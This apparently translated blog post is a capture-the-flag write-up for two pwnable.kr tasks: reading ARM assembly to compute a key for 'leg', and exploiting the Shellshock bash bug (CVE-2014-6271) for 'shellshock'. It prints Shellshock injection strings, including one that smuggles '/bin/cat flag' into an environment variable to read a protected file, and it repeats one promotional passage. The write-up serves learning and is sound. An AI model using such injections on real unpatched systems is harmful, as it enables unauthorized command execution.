Problem solving with pwnable.kr 08 is leg and 10 is shellshock. ARM assembler. Bash vulnerability
In this article, we recall the syntax of the ARM assembler, deal with the shellshock vulnerability, and also solve the 8th and 10th tasks from the site pwnable.kr .
Organizational Information
Especially for those who want to learn something new and develop in any of the areas of information and computer security, I will write and talk about the following categories:
In addition to this, I will share my experience in computer forensics, analysis of malware and firmware, attacks on wireless networks and local area networks, conducting pentests and writing exploits.
So that you can find out about new articles, software and other information, I created a channel in Telegram and a group to discuss any issues in the field of ICD. Also, I will personally consider your personal requests, questions, suggestions and recommendations personally and will answer everyone .
')
All information is provided for educational purposes only. The author of this document does not bear any responsibility for any damage caused to anyone as a result of using knowledge and methods obtained as a result of studying this document.
- PWN;
- cryptography (Crypto);
- network technologies (Network);
- reverse (Reverse Engineering);
- steganography (Stegano);
- search and exploitation of WEB vulnerabilities.
In addition to this, I will share my experience in computer forensics, analysis of malware and firmware, attacks on wireless networks and local area networks, conducting pentests and writing exploits.
So that you can find out about new articles, software and other information, I created a channel in Telegram and a group to discuss any issues in the field of ICD. Also, I will personally consider your personal requests, questions, suggestions and recommendations personally and will answer everyone .
')
All information is provided for educational purposes only. The author of this document does not bear any responsibility for any damage caused to anyone as a result of using knowledge and methods obtained as a result of studying this document.
Leg quest solution
We click on the first icon with the signature leg, and we are told that we need to connect via SSH with the password guest. They also provide source code in C and assembler.
Let's download both files and sort the source code in C. By assembly language, we can say that it uses ARM syntax. About ARM assembler on Habré wrote here and here .
In the main () function, a number is received from the user and compared with the sum of the results of the three key () functions. Let's sort them in order.
Thus, the value from the PC register is placed in register R3. In ARM assembler, the PC register contains the address of the next instruction to be executed. We look at the disassembled code.
Thus, the key1 () function will return the value 0x8ce4. Let's analyze the key2 () function.
0x8d08 is placed in R3, which is then incremented by 4 and written to the register R0. That is, key2 () will return 0x8d0c. Consider key3 ().
By analogy with the first function, we conclude that key3 () will return a value from the LR register. LR contains the return address of the function. Let's see where the function is called and take the following address.
The key3 () function will return 0x8d80. Connect via SSH and enter the sum of the three numbers found in the program.
We hand over the flag and get two points.
Shellshock aka Bashdoor
Shellshock (Bashdoor) is a software vulnerability discovered in the GNU Bash program that allows arbitrary commands to be executed upon receipt of some non-standard values ​​of environment variables. The vulnerability has received the number CVE-2014-6271.
On Unix-like operating systems, each program has environment variables. The child process inherits from the parent a list of environment variables. In addition to environment variables, bash also maintains an internal list of functions - named scripts that can be called from an executable script. When running scripts from other (parent) scripts, it is possible to export the values ​​of existing environment variables and function definitions. Function definitions are exported by encoding them in the form of new environment variables of a special format, starting with empty brackets “()”, followed by the definition of the function as a string. New bash instances at their start scan all environment variables, detecting this format and converting it back to the definition of an internal function. Thus, if an attacker has the ability to submit an arbitrary environment variable to run bash, then the ability to execute arbitrary commands appears.
The following example prints the text VULN.
env x='() { : ; }; echo “VULN”' bash -c “echo text” Since when executing the “echo text” command, the function definition contained in the environment variable x will be loaded, and the 'echo “VULN” ”command will be executed with it.
Shellshock job solution
We click on the first icon with the signature shellshock, and we are told that we need to connect via SSH with the password guest.
When connected, we see the corresponding banner.
Let's find out what files are on the server, as well as what rights we have.
Let's see the outcome of the code.
Of interest is the line calling the system function. Based on the name, we assume that bash, which is next to the program and called from the program, is vulnerable. By analogy with the attack described in the article, we execute the command to read the flag.
/bin/cat flag To do this, we define a function in the environment variable where we place this command. And then run the program.
export x="() { :; }; /bin/cat flag;" 
We hand over the flag and get one more point. See you in the next article.
We are in a telegram channel: a channel in Telegram .
Source: https://habr.com/ru/post/461269/
All Articles